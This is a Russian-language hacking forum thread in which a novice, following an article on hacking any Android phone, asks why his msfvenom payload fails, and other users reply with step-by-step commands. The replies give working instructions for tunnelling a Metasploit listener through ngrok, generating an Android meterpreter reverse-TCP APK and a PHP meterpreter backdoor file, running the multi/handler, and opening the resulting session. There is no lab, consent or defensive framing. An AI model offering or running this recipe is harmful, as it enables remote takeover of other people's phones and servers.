• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Msfvenom

A

Alta1r

Добрый день, я совсем новичок и никак не могу понять, хотя долго гуглил. Решил попробовать что-то по этой статье ( Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android ), но почему-то ничего не происходит, можно обьяснить, почему?
27901
27902
27903



Мб это изза того,что я указываю LHOST, а телефон мой не входит в локальную сеть с ПК
 

Bron Frol

Green Team
23.03.2019
53
75
BIT
5

Открой второе окно терминала в папке куда скачал архив
Введи там
Код:
unzip (имя_архива)
, после чего вводи
Код:
./ngrok help
. Увидешь там команды (к примеру для проброса tcp, тебе нужно ввести
Код:
./ngrok tcp 22
Не закрывая окно с ngrok, переходи в окно терминала msfvenom и в нём уже, указывай вместо стандартного порта тот, что указан в окне ngrok
 
  • Нравится
Реакции: Alta1r
A

Alta1r


Открой второе окно терминала в папке куда скачал архив
Введи там
Код:
unzip (имя_архива)
, после чего вводи
Код:
./ngrok help
. Увидешь там команды (к примеру для проброса tcp, тебе нужно ввести
Код:
./ngrok tcp 22
Не закрывая окно с ngrok, переходи в окно терминала msfvenom и в нём уже, указывай вместо стандартного порта тот, что указан в окне ngrok
27932
27933

чет я все равно туплю
 

Bron Frol

Green Team
23.03.2019
53
75
BIT
5
В твоём случае, нужно запустить тоннель http

Код:
./ngrok http 80

А в "LHOST" указать сроку "FORWARDING" (будет что-то типо этого: )
 

id2746

Green Team
12.11.2016
435
644
BIT
21
вот тебе быстрая настройка через ngrok, надеюсь разберешься что к чему:
1. Запускаем ngrok:
Код:
./ngrok tcp 4444

получаешь: tcp://0.tcp.ngrok.io:15978 -> localhost:4444



2. Настройка payload:
Код:
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15978 -f raw > /root/back_perdak.php

3. Настройка в MSF
Код:
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

Запускается нагрузка - получаешь бэкконнект.
 
  • Нравится
Реакции: Vertigo

Bron Frol

Green Team
23.03.2019
53
75
BIT
5
В целом всё так, только не php, а android
Alta1r, что бы ты не запутался -- резюмирую всё :)
___________________________________________________
Код:
./ngrok tcp 4444
(На самом деле порт можешь указать любой незанятый)
Получаешь tcp://0.tcp.ngrok.io:10409 -> localhost:4444

Открываешь новый терминал:

Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10409 R > qq.apk
Полученный файл кидаешь на телефон

Далее в терминале пишем:
Код:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
После чего запускаешь приложение на телефоне.
Всё. Откроется сессия (если ранее не доходил до этого шага, то session 1
Дальше в этом же окне
Код:
session -i 1
Если увидел заветное слово "meterpreter" -- поздравляю, можешь писать
Код:
help
и развлекаться ;-)

P.S. В твоё последнем сообщении не работало из-за того, что ты запускал занова эксплоит после обрыва (ctrl+c). Нужно было или остановить или (даже лучше) выйти из msfconsole и зайти в неё занова
 
  • Нравится
Реакции: Alta1r
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!